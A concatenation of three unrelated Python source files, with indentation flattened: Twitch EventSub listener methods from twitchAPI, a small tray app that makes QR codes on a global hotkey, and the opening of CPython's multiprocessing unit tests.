def listen_channel_moderator_add(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""Moderator privileges were added to a user on a specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelmoderatoradd
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.moderator.add',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_moderator_remove(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""Moderator privileges were removed from a user on a specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelmoderatorremove
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.moderator.remove',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_points_custom_reward_add(self, broadcaster_user_id: str,
callback: CALLBACK_TYPE) -> str:
"""A custom channel points reward has been created for the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelchannel_points_custom_rewardadd
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.channel_points_custom_reward.add',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_points_custom_reward_update(self,
broadcaster_user_id: str,
callback: CALLBACK_TYPE,
reward_id: Optional[str] = None) -> str:
"""A custom channel points reward has been updated for the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelchannel_points_custom_rewardupdate
:param str broadcaster_user_id: the id of the user you want to listen to
:param str reward_id: the id of the reward you want to get updates from. |default| :code:`None`
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.channel_points_custom_reward.update',
'1',
remove_none_values({
'broadcaster_user_id': broadcaster_user_id,
'reward_id': reward_id}),
callback)
def listen_channel_points_custom_reward_remove(self,
broadcaster_user_id: str,
callback: CALLBACK_TYPE,
reward_id: Optional[str] = None) -> str:
"""A custom channel points reward has been removed from the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelchannel_points_custom_rewardremove
:param str broadcaster_user_id: the id of the user you want to listen to
:param str reward_id: the id of the reward you want to get updates from. |default| :code:`None`
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.channel_points_custom_reward.remove',
'1',
remove_none_values({
'broadcaster_user_id': broadcaster_user_id,
'reward_id': reward_id}),
callback)
def listen_channel_points_custom_reward_redemption_add(self,
broadcaster_user_id: str,
callback: CALLBACK_TYPE,
reward_id: Optional[str] = None) -> str:
"""A viewer has redeemed a custom channel points reward on the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelchannel_points_custom_reward_redemptionadd
:param str broadcaster_user_id: the id of the user you want to listen to
:param str reward_id: the id of the reward you want to get updates from. |default| :code:`None`
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.channel_points_custom_reward_redemption.add',
'1',
remove_none_values({
'broadcaster_user_id': broadcaster_user_id,
'reward_id': reward_id}),
callback)
def listen_channel_points_custom_reward_redemption_update(self,
broadcaster_user_id: str,
callback: CALLBACK_TYPE,
reward_id: Optional[str] = None) -> str:
"""A redemption of a channel points custom reward has been updated for the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelchannel_points_custom_reward_redemptionupdate
:param str broadcaster_user_id: the id of the user you want to listen to
:param str reward_id: the id of the reward you want to get updates from. |default| :code:`None`
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.channel_points_custom_reward_redemption.update',
'1',
remove_none_values({
'broadcaster_user_id': broadcaster_user_id,
'reward_id': reward_id}),
callback)
def listen_channel_poll_begin(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A poll started on a specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelpollbegin
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.poll.begin',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_poll_progress(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""Users respond to a poll on a specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelpollprogress
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.poll.progress',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_poll_end(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A poll ended on a specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelpollend
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.poll.end',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_prediction_begin(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A Prediction started on a specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelpredictionbegin
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.prediction.begin',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_prediction_progress(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""Users participated in a Prediction on a specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelpredictionprogress
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.prediction.progress',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_prediction_lock(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A Prediction was locked on a specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelpredictionlock
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.prediction.lock',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_channel_prediction_end(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A Prediction ended on a specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelpredictionend
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.prediction.end',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_drop_entitlement_grant(self,
organisation_id: str,
callback: CALLBACK_TYPE,
category_id: Optional[str] = None,
campaign_id: Optional[str] = None) -> str:
"""An entitlement for a Drop is granted to a user.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#dropentitlementgrant
:param str organisation_id: The organization ID of the organization that owns the game on the developer portal.
:param str category_id: The category (or game) ID of the game for which entitlement notifications will be received.
|default| :code:`None`
:param str campaign_id: The campaign ID for a specific campaign for which entitlement notifications will be received.
|default| :code:`None`
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('drop.entitlement.grant',
'1',
remove_none_values({
'organization_id': organisation_id,
'category_id': category_id,
'campaign_id': campaign_id
}),
callback)
def listen_extension_bits_transaction_create(self,
extension_client_id: str,
callback: CALLBACK_TYPE) -> str:
"""A Bits transaction occurred for a specified Twitch Extension.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#extensionbits_transactioncreate
:param str extension_client_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('extension.bits_transaction.create',
'1',
{'extension_client_id': extension_client_id},
callback)
def listen_goal_begin(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A goal begins on the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelgoalbegin
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.goal.begin',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_goal_progress(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A goal makes progress on the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelgoalprogress
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.goal.progress',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_goal_end(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A goal ends on the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelgoalend
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.goal.end',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_hype_train_begin(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A Hype Train begins on the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelhype_trainbegin
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.hype_train.begin',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_hype_train_progress(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A Hype Train makes progress on the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelhype_trainprogress
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.hype_train.progress',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_hype_train_end(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""A Hype Train ends on the specified channel.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#channelhype_trainend
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('channel.hype_train.end',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_stream_online(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""The specified broadcaster starts a stream.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#streamonline
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('stream.online',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_stream_offline(self, broadcaster_user_id: str, callback: CALLBACK_TYPE) -> str:
"""The specified broadcaster stops a stream.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#streamoffline
:param str broadcaster_user_id: the id of the user you want to listen to
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('stream.offline',
'1',
{'broadcaster_user_id': broadcaster_user_id},
callback)
def listen_user_authorization_grant(self, client_id: str, callback: CALLBACK_TYPE) -> str:
"""A user’s authorization has been granted to your client id.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#userauthorizationgrant
:param str client_id: Your application’s client id.
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('user.authorization.grant',
'1',
{'client_id': client_id},
callback)
def listen_user_authorization_revoke(self, client_id: str, callback: CALLBACK_TYPE) -> str:
"""A user’s authorization has been revoked for your client id.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#userauthorizationrevoke
:param str client_id: Your application’s client id.
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('user.authorization.revoke',
'1',
{'client_id': client_id},
callback)
def listen_user_update(self, user_id: str, callback: CALLBACK_TYPE) -> str:
"""A user has updated their account.
For more information see here: https://dev.twitch.tv/docs/eventsub/eventsub-subscription-types#userupdate
:param str user_id: The user ID for the user you want update notifications for.
:param Callable[[dict],Awaitable[None]] callback: function for callback
:raises ~twitchAPI.types.EventSubSubscriptionConflict: if a conflict was found with this subscription
(e.g. already subscribed to this exact topic)
:raises ~twitchAPI.types.EventSubSubscriptionTimeout: if :code:`wait_for_subscription_confirm`
is true and the subscription was not fully confirmed in time
:raises ~twitchAPI.types.EventSubSubscriptionError: if the subscription failed (see error message for details)
:raises ~twitchAPI.types.TwitchBackendException: if the subscription failed due to a twitch backend error
:rtype: str
"""
return self._subscribe('user.update',
'1',
{'user_id': user_id},
callback)
|
app.py
|
# Tray
from pystray import MenuItem as item
import pystray
# Dialog box
from tkinter import Tk, Label, Button, Entry
import pyqrcode
from PIL import ImageTk, Image
from os import path, kill
from pynput import keyboard
from multiprocessing import Process
# Set default paths for images
basepath = path.dirname(__file__)
tray_icon = path.abspath(path.join(basepath, "tray_icon.png"))
transparent = path.abspath(path.join(basepath, "transparent.ico"))
qr_code = path.abspath(path.join(basepath, "current_qr.png"))
class QRdialog:
def __init__(self, master):
self.master = master
master.title("")
master.geometry('250x250')
master.iconbitmap(default=transparent)
master.lift()
master.focus_force()
master.resizable(width=False, height=False)
def showCode():
print("Showing new code")
path = qr_code
img = Image.open(path)
img = img.resize((250, 250), Image.ANTIALIAS)
img = ImageTk.PhotoImage(img)
self.label = Label(master, image=img)
self.label.img = img
self.label.pack()
# Set input
self.entry = Entry(master, )
def updateCode(event):
# Generate QR Code
print(self.entry.get())
qr = pyqrcode.create(self.entry.get())
qr.png(qr_code)
# Update DialogBox
master.after(300, showCode)
master.bind('<Return>', updateCode)
self.label = Label(
master, text="Enter text to convert", bg="black", fg="white")
self.label.pack(side="top", fill="both")
self.label = self.entry
self.label.pack(side="top", fill="both")
class SettingsDialog:
def __init__(self, master):
self.master = master
master.title("QQR settings")
master.geometry('350x200')
master.iconbitmap(default=transparent)
master.focus_force()
master.minsize(350, 200)
self.label = Label(master, text="Quick QR settings",
bg="black", fg="white")
self.label.pack(side="top", fill="both")
self.close_button = Button(
master, text="Close application", command=CloseApp())
self.close_button.pack()
def ShowSettingsDialog():
root = Tk()
SettingsDialog(root)
root.mainloop()
def ShowQRcode():
root = Tk()
QRdialog(root)
root.mainloop()
def CloseApp():
global _FINISH
_FINISH = True
icon.stop()
# Tray
image = Image.open(tray_icon)
menu = (item('Open Settings', ShowSettingsDialog), item(
'Generate Code', ShowQRcode), item('End QQR', CloseApp))
icon = pystray.Icon("name", image, "QQR", menu)
def openTray(finish):
print(finish)
print("Opening tray")
icon.run()
# Key listener
def key_listener():
# The key combination to check
COMBINATION = {keyboard.Key.cmd, keyboard.KeyCode(char='n')}
# The currently active modifiers
current = set()
def on_press(key):
if key in COMBINATION:
current.add(key)
if all(k in current for k in COMBINATION):
ShowQRcode()
current.clear()
if key == keyboard.Key.esc:
listener.stop()
def on_release(key):
try:
current.remove(key)
except KeyError:
pass
with keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
def main():
p1 = Process(target=key_listener)
p1.start()
p2 = Process(target=openTray)
p2.start()
# p1.join()
# p2.join()
# p1.terminate()
# p2.terminate()
if __name__ == '__main__':
main()
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import contextlib
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import weakref
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 30.0 # seconds
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
support.join_thread(process, timeout=TIMEOUT)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
